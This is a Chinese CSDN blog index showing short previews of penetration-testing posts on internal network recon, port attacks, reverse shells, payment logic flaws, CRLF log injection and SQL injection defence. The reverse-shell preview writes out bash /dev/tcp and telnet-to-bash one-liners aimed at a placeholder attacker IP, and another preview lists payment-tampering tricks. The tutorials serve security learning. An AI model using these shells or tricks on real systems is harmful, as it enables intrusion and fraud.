sunfilowers-优快云博客

原创内网信息收集

内网信息收集查询网络配置信息ifconfig查询操作系统和版本信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查看安装的软件及版本、路径等wmic product get name,version(powershell "Get-WmiObject -class Win32_Product |Select-Object -Pro

2021-06-15 17:51:42 181

原创常见端口及其利用方式

21 (FTP) 主要看是否支持匿名，也可跑弱口令 22 SSH 弱口令、暴力猜解、用户名枚举

2021-06-15 15:58:58 950

原创反弹Shell姿势

反弹Shell多种姿势0X01 Bash反弹攻击者主机上执行监听：nc -lvvp port目标主机上执行：bash -i >& /dev/tcp/x.x.x.x/port 0>&10X02 telnet反弹攻击者主机上打开两个终端分别执行监听：nc -lvvp 4444nc -lvvp 6666目标主机中执行：telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 6666(监听两个端口分别用来输入和输

2021-04-14 12:20:53 177

原创虚拟机解压缩命令

虚拟机解压缩命令1、.tar 用 tar –xvf 解压2、.gz 用 gzip -d或者gunzip 解压3、.tar.gz和.tgz 用 tar –xzf 解压4、.bz2 用 bzip2 -d或者用bunzip2 解压5、.tar.bz2用tar –xjf 解压6、.Z 用 uncompress 解压7、.tar.Z 用tar –xZf 解压8、.rar 用 unrar e解压9、.zip 用 unzip 解压...

2021-03-18 16:11:11 15900 1

原创逻辑漏洞之支付漏洞

逻辑漏洞之支付漏洞挖掘此类漏洞时要先：明确操作点寻找可控参数修改参数抓包放包对比信息泄露/越权：修改变量id遍历其他用户订单信息修改金额：（正负逻辑/0.01购买/最大值越界）更改订单状态：（更改接口处关键值为已支付的状态）多线程并发具体思路：1.下单时抓包修改商品价格或数量2.多线程并发购买3.商品为0时更改关键参数看是否能够购买成功4.优惠卷重复利用5.更改支付API6.更改支付状态关键值（两个账号A,B用A正常走一遍购买流程记住支付成功状态值，然后用B购买订单生成时抓包修

2020-11-22 16:37:35 1171 2

原创注入攻击之CRLF

CRLF实际上是两个字符\r(十六进制编码:0x0d) \n(0x0a)在日志文件中可伪造日志记录def log_failed_login(username) log=open("access.log",'a') log.write("User login failed for: %s\n" % username) log.close()在正常情况下，会记录如下日志：Use...

2020-06-22 16:29:59 796 1

原创 kali中安装vm-tools

kali官方推荐open-vm-tools1.apt update && apt-y full-upgrade更新kali官方软件仓库里面的软件包，拿到软件包版本信息2.apt-y install open-vm-tools-desktop fuse安装vm-tools以及配和软件包fuse3.reboot重启系统...

2020-06-22 16:29:20 134

原创小白Google黑客语法

2020-06-22 16:27:37 1066

原创防sql注入随笔

**从php角度:！！！使用预定义语句：将语句储存在数据库端，只传递参数用？占位符（stmt_init生成预定义对象 stmt_prepare将语句储存准备stmt_bind_param绑定参数传递参数 stmt_execute执行 stmt_bind_result绑定结果集 stmt_fetch匹配结果集(一次只取出一个结果)stmt_store_result(一次将结果...

2020-02-12 22:20:50 103

xnvyou_的博客